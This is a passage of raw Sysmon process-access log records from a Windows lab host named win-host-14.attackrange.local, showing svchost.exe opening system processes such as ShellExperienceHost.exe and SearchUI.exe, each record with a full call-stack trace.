21:43:46.413{39BD8DE3-0F64-60CA-0C00-00000000D101}7206400C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1F00-00000000D101}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149565Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.413{39BD8DE3-0F64-60CA-0D00-00000000D101}7886532C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149564Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.413{39BD8DE3-0F64-60CA-0D00-00000000D101}7886532C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149563Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.413{39BD8DE3-0F64-60CA-0D00-00000000D101}7886532C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149562Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.413{39BD8DE3-0F64-60CA-0D00-00000000D101}7886532C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149561Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.413{39BD8DE3-0F64-60CA-0C00-00000000D101}7206400C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1F00-00000000D101}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149560Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.413{39BD8DE3-0F64-60CA-0D00-00000000D101}7886532C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149559Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.413{39BD8DE3-0F64-60CA-0D00-00000000D101}7886532C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149558Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.413{39BD8DE3-0F64-60CA-0D00-00000000D101}7886532C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149557Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.413{39BD8DE3-0F64-60CA-0D00-00000000D101}7886532C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149556Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.413{39BD8DE3-0F64-60CA-0D00-00000000D101}7886532C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149555Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.413{39BD8DE3-0F64-60CA-0D00-00000000D101}7886532C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149554Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.413{39BD8DE3-0F64-60CA-0D00-00000000D101}7886532C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149553Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.413{39BD8DE3-0F64-60CA-0D00-00000000D101}7886532C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149552Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.413{39BD8DE3-0F64-60CA-0D00-00000000D101}7886532C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149551Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.413{39BD8DE3-0F64-60CA-0D00-00000000D101}7886532C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+1514|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149550Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.397{39BD8DE3-0F64-60CA-0C00-00000000D101}7201984C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149549Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.397{39BD8DE3-0F64-60CA-0C00-00000000D101}7201984C:\Windows\system32\svchost.exe{39BD8DE3-0FDB-60CA-8D00-00000000D101}648C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149548Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.397{39BD8DE3-0F64-60CA-0C00-00000000D101}7201984C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000149547Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.397{39BD8DE3-0F64-60CA-0C00-00000000D101}7201984C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x8000000000000000149546Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.397{39BD8DE3-0F64-60CA-0C00-00000000D101}7201984C:\Windows\system32\svchost.exe{39BD8DE3-0FDB-60CA-8D00-00000000D101}648C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x8000000000000000149545Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:43:46.397{39BD8DE3-0F64-60CA-0C00-00000000D101}7201984C:\Windows\system32\svchost.exe{39BD8DE3-0FDA-60CA-8C00-00000000D101}3552C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepo